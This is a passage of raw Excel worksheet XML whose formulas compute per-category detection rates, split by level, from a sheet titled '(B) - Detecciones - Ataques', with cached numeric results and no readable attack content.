        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ40)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ40 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ40)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ40 &amp; "*"))</f>
        <v>0.9997122716</v>
      </c>
      <c r="FB40" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ40)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ40 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ40)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ40 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC40" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ40,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ40 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ40,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ40 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.9997122716</v>
      </c>
      <c r="FD40" s="635" t="s">
        <v>12</v>
      </c>
      <c r="FE40" s="403"/>
      <c r="FF40" s="403"/>
      <c r="FG40" s="403"/>
      <c r="FH40" s="403"/>
      <c r="FI40" s="403"/>
      <c r="FJ40" s="403"/>
      <c r="FK40" s="403"/>
      <c r="FL40" s="403"/>
      <c r="FM40" s="403"/>
      <c r="FN40" s="403"/>
      <c r="FO40" s="403"/>
      <c r="FP40" s="403"/>
      <c r="FQ40" s="403"/>
      <c r="FR40" s="403"/>
      <c r="FS40" s="403"/>
      <c r="FT40" s="403"/>
      <c r="FU40" s="403"/>
    </row>
    <row r="41">
      <c r="DC41" s="770"/>
      <c r="DD41" s="441"/>
      <c r="DE41" s="771" t="s">
        <v>2674</v>
      </c>
      <c r="DF41" s="772" t="s">
        <v>2675</v>
      </c>
      <c r="EC41" s="20"/>
      <c r="ED41" s="20"/>
      <c r="EE41" s="20"/>
      <c r="EF41" s="20"/>
      <c r="EG41" s="20"/>
      <c r="EH41" s="20"/>
      <c r="EL41" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP32&lt;&gt;0,'(B) - Detecciones - Ataques'!IP32*'(B) - Detecciones - Ataques'!IL32/('(B) - Detecciones - Ataques'!IL32+'(B) - Detecciones - Ataques'!IN32),0)</f>
        <v>0</v>
      </c>
      <c r="EM41" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP32&lt;&gt;0,'(B) - Detecciones - Ataques'!IP32*'(B) - Detecciones - Ataques'!IN32/('(B) - Detecciones - Ataques'!IL32+'(B) - Detecciones - Ataques'!IN32),0)</f>
        <v>0</v>
      </c>
      <c r="EN41" s="626"/>
      <c r="EO41" s="626"/>
      <c r="EP41" s="744"/>
      <c r="EQ41" s="745"/>
      <c r="ER41" s="745"/>
      <c r="ES41" s="745"/>
      <c r="ET41" s="745"/>
      <c r="EU41" s="745"/>
      <c r="EV41" s="745"/>
      <c r="EW41" s="745"/>
      <c r="EX41" s="745"/>
      <c r="EY41" s="745"/>
      <c r="EZ41" s="379" t="s">
        <v>951</v>
      </c>
      <c r="FA41" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*"))</f>
        <v>0.6333333333</v>
      </c>
      <c r="FB41" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="FC41" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FD41" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
      <c r="FE41" s="621"/>
      <c r="FF41" s="621"/>
      <c r="FG41" s="621"/>
      <c r="FH41" s="621"/>
      <c r="FI41" s="621"/>
      <c r="FJ41" s="621"/>
      <c r="FK41" s="621"/>
      <c r="FL41" s="621"/>
      <c r="FM41" s="621"/>
      <c r="FN41" s="621"/>
      <c r="FO41" s="621"/>
      <c r="FP41" s="621"/>
      <c r="FQ41" s="621"/>
      <c r="FR41" s="621"/>
      <c r="FS41" s="621"/>
      <c r="FT41" s="621"/>
      <c r="FU41" s="621"/>
    </row>
    <row r="42">
      <c r="DC42" s="773" t="s">
        <v>2452</v>
      </c>
      <c r="DD42" s="774" t="s">
        <v>2477</v>
      </c>
      <c r="DE42" s="775">
        <f>FA11</f>
        <v>0.6014944481</v>
      </c>
      <c r="DF42" s="659">
        <f>FA12</f>
        <v>0.7045454545</v>
      </c>
      <c r="EC42" s="336"/>
      <c r="ED42" s="336"/>
      <c r="EE42" s="336"/>
      <c r="EF42" s="336"/>
      <c r="EG42" s="336"/>
      <c r="EH42" s="336"/>
      <c r="EL42" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP33&lt;&gt;0,'(B) - Detecciones - Ataques'!IP33*'(B) - Detecciones - Ataques'!IL33/('(B) - Detecciones - Ataques'!IL33+'(B) - Detecciones - Ataques'!IN33),0)</f>
        <v>0</v>
      </c>
      <c r="EM42" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP33&lt;&gt;0,'(B) - Detecciones - Ataques'!IP33*'(B) - Detecciones - Ataques'!IN33/('(B) - Detecciones - Ataques'!IL33+'(B) - Detecciones - Ataques'!IN33),0)</f>
        <v>0</v>
      </c>
      <c r="EN42" s="626"/>
      <c r="EO42" s="626"/>
      <c r="EP42" s="744"/>
      <c r="EQ42" s="745"/>
      <c r="ER42" s="745"/>
      <c r="ES42" s="745"/>
      <c r="ET42" s="745"/>
      <c r="EU42" s="745"/>
      <c r="EV42" s="745"/>
      <c r="EW42" s="745"/>
      <c r="EX42" s="745"/>
      <c r="EY42" s="745"/>
      <c r="EZ42" s="379" t="s">
        <v>633</v>
      </c>
      <c r="FA42" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="FB42" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="FC42" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>1</v>
      </c>
      <c r="FD42" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ42,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ42 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
      <c r="FE42" s="621"/>
      <c r="FF42" s="621"/>
      <c r="FG42" s="621"/>
      <c r="FH42" s="621"/>
      <c r="FI42" s="621"/>
      <c r="FJ42" s="621"/>
      <c r="FK42" s="621"/>
      <c r="FL42" s="621"/>
      <c r="FM42" s="621"/>
      <c r="FN42" s="621"/>
      <c r="FO42" s="621"/>
      <c r="FP42" s="621"/>
      <c r="FQ42" s="621"/>
      <c r="FR42" s="621"/>
      <c r="FS42" s="621"/>
      <c r="FT42" s="621"/>
      <c r="FU42" s="621"/>
    </row>
    <row r="43">
      <c r="DC43" s="776" t="s">
        <v>2462</v>
      </c>
      <c r="DD43" s="777" t="s">
        <v>2478</v>
      </c>
      <c r="DE43" s="778">
        <f>DF35</f>
        <v>0.3294960948</v>
      </c>
      <c r="DF43" s="664">
        <f>DF35</f>
        <v>0.3294960948</v>
      </c>
      <c r="EL43" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP34&lt;&gt;0,'(B) - Detecciones - Ataques'!IP34*'(B) - Detecciones - Ataques'!IL34/('(B) - Detecciones - Ataques'!IL34+'(B) - Detecciones - Ataques'!IN34),0)</f>
        <v>1</v>
      </c>
      <c r="EM43" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP34&lt;&gt;0,'(B) - Detecciones - Ataques'!IP34*'(B) - Detecciones - Ataques'!IN34/('(B) - Detecciones - Ataques'!IL34+'(B) - Detecciones - Ataques'!IN34),0)</f>
        <v>0</v>
      </c>
      <c r="EN43" s="626"/>
      <c r="EO43" s="626"/>
      <c r="EP43" s="744"/>
      <c r="EQ43" s="745"/>
      <c r="ER43" s="745"/>
      <c r="ES43" s="745"/>
      <c r="ET43" s="745"/>
      <c r="EU43" s="745"/>
      <c r="EV43" s="745"/>
      <c r="EW43" s="745"/>
      <c r="EX43" s="745"/>
      <c r="EY43" s="745"/>
      <c r="EZ43" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="FA43" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ43)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ43 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ43)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ43 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FB43" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ43)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ43 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ43)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ43 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC43" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ43,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ43 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ43,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ43 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>1</v>
      </c>
      <c r="FD43" s="635" t="s">
        <v>12</v>
      </c>
      <c r="FE43" s="403"/>
      <c r="FF43" s="403"/>
      <c r="FG43" s="403"/>
      <c r="FH43" s="403"/>
      <c r="FI43" s="403"/>
      <c r="FJ43" s="403"/>
      <c r="FK43" s="403"/>
      <c r="FL43" s="403"/>
      <c r="FM43" s="403"/>
      <c r="FN43" s="403"/>
      <c r="FO43" s="403"/>
      <c r="FP43" s="403"/>
      <c r="FQ43" s="403"/>
      <c r="FR43" s="403"/>
      <c r="FS43" s="403"/>
      <c r="FT43" s="403"/>
      <c r="FU43" s="403"/>
    </row>
    <row r="44">
      <c r="DC44" s="779" t="s">
        <v>2465</v>
      </c>
      <c r="DD44" s="674"/>
      <c r="DE44" s="780">
        <f t="shared" ref="DE44:DF44" si="25">SQRT(DE42*(1-DE43))</f>
        <v>0.635062498</v>
      </c>
      <c r="DF44" s="781">
        <f t="shared" si="25"/>
        <v>0.6873139593</v>
      </c>
      <c r="EL44" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP35&lt;&gt;0,'(B) - Detecciones - Ataques'!IP35*'(B) - Detecciones - Ataques'!IL35/('(B) - Detecciones - Ataques'!IL35+'(B) - Detecciones - Ataques'!IN35),0)</f>
        <v>0</v>
      </c>
      <c r="EM44" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP35&lt;&gt;0,'(B) - Detecciones - Ataques'!IP35*'(B) - Detecciones - Ataques'!IN35/('(B) - Detecciones - Ataques'!IL35+'(B) - Detecciones - Ataques'!IN35),0)</f>
        <v>0</v>
      </c>
      <c r="EN44" s="626"/>
      <c r="EO44" s="626"/>
      <c r="EP44" s="744"/>
      <c r="EQ44" s="745"/>
      <c r="ER44" s="745"/>
      <c r="ES44" s="745"/>
      <c r="ET44" s="745"/>
      <c r="EU44" s="745"/>
      <c r="EV44" s="745"/>
      <c r="EW44" s="745"/>
      <c r="EX44" s="745"/>
      <c r="EY44" s="745"/>
      <c r="EZ44" s="379" t="s">
        <v>244</v>
      </c>
      <c r="FA44" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ44)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ44 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ44)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ44 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FB44" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ44)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ44 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ44)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ44 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FC44" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ44,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ44 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ44,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ44 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FD44" s="635" t="s">
        <v>12</v>
      </c>
      <c r="FE44" s="403"/>
      <c r="FF44" s="403"/>
      <c r="FG44" s="403"/>
      <c r="FH44" s="403"/>
      <c r="FI44" s="403"/>
      <c r="FJ44" s="403"/>
      <c r="FK44" s="403"/>
      <c r="FL44" s="403"/>
      <c r="FM44" s="403"/>
      <c r="FN44" s="403"/>
      <c r="FO44" s="403"/>
      <c r="FP44" s="403"/>
      <c r="FQ44" s="403"/>
      <c r="FR44" s="403"/>
      <c r="FS44" s="403"/>
      <c r="FT44" s="403"/>
      <c r="FU44" s="403"/>
    </row>
    <row r="45">
      <c r="EL45" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP36&lt;&gt;0,'(B) - Detecciones - Ataques'!IP36*'(B) - Detecciones - Ataques'!IL36/('(B) - Detecciones - Ataques'!IL36+'(B) - Detecciones - Ataques'!IN36),0)</f>
        <v>0</v>
      </c>
      <c r="EM45" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP36&lt;&gt;0,'(B) - Detecciones - Ataques'!IP36*'(B) - Detecciones - Ataques'!IN36/('(B) - Detecciones - Ataques'!IL36+'(B) - Detecciones - Ataques'!IN36),0)</f>
        <v>0</v>
      </c>
      <c r="EN45" s="626"/>
      <c r="EO45" s="626"/>
      <c r="EP45" s="744"/>
      <c r="EQ45" s="745"/>
      <c r="ER45" s="745"/>
      <c r="ES45" s="745"/>
      <c r="ET45" s="745"/>
      <c r="EU45" s="745"/>
      <c r="EV45" s="745"/>
      <c r="EW45" s="745"/>
      <c r="EX45" s="745"/>
      <c r="EY45" s="745"/>
      <c r="EZ45" s="379" t="s">
        <v>427</v>
      </c>
      <c r="FA45" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="FB45" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="FC45" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ45,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ45 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="FD45" s="666">
